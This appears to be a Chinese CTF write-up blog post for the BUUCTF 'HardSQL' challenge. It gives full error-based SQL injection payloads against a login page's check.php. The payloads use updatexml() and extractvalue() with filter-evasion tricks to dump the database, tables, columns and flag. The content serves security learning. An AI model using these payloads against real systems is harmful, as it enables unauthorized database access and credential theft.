web:[极客大挑战 2019]HardSQL

sleepywin2023-10-20 18:52

题目

打开页面显示为

查看源代码没有发现其他的提示信息,随便尝试一下

错误

题目名为hardsql,先来尝试有无sql注入存在

尝试输入单引号输入

显示页面存在注入

这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有任何显示

上述测试闭合时返回了错误信息,用bp抓包,看一下过滤的,发现用于报错的注入函数没有被过滤

使用updatexml

通过查询可知,updatexml在执行时,第二个参数应该为合法的xpath路径,否则会引发报错的同时将传入的参数进行输出

先查询数据库,构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=123

可得知数据库名为geek

查询表,构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23&password=123

得到表

查字段,构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23&password=123

可以得到字段名

然后查询想要的字段

构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23&password=123

发现flag显示不全,函数显示有字符数限制

使用right可得到另一半

构造payload

复制代码 
http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?username=admin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23&password=123
使用extractvalue()

这里空格和=没有,使用()代替空格,使用like代替=

查数据库

构造payload

复制代码 
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23

查表

构造payload

复制代码 
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

查字段

构造payload

复制代码 
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

查数据

复制代码 
/check.php?username=admin&password=123'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

这里也是显示不全,按照上面的updatexml后的方法进行补全即可

参考文章链接:

buuctf-[极客大挑战 2019]HardSQL(小宇特详解)_小宇特详解的博客-CSDN博客

https://www.cnblogs.com/GTL-JU/p/16042242.html

https://www.cnblogs.com/upfine/p/16578800.html

相关推荐
wang6021252188 分钟前
阿里云存储的一些简要概述
数据库·阿里云·fastapi
小徐Chao努力1 小时前
【Langchain4j-Java AI开发】08-向量嵌入与向量数据库
java·数据库·人工智能
TG:@yunlaoda360 云老大1 小时前
华为云国际站代理商GSL主要有什么作用呢?
网络·数据库·华为云
TG:@yunlaoda360 云老大1 小时前
华为云国际站代理商GSL的流量用量与资费合规是如何实现的?
网络·数据库·华为云
冰冰菜的扣jio1 小时前
MySQL三大重要日志详解
数据库·mysql
l1t1 小时前
postgresql递归查询指定搜索顺序的方法
数据库·postgresql·dfs·递归·cte
java1234_小锋2 小时前
Redis的热Key问题如何解决?
数据库·redis·缓存
wang6021252182 小时前
FastAPI框架为什么在启动时建表
数据库
男孩李2 小时前
linux下如何执行postgres数据库的sql文件
数据库·sql·postgresql
zwjapple2 小时前
MySQL SQL 面试核心考点与注意事项总结
数据库·sql·mysql
热门推荐
01GitHub 镜像站点02从快手“12·22”直播攻击事件看:一次教科书式的业务层饱和攻击03电脑检测软件—图吧工具箱043D 圣诞树网页代码05Linux下V2Ray安装配置指南06UV安装并设置国内源07在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)08jdk21下载、安装(Windows、Linux、macOS)09Gemini3 生成的基于手势控制3D粒子圣诞树10Claude Code Skills 实用使用手册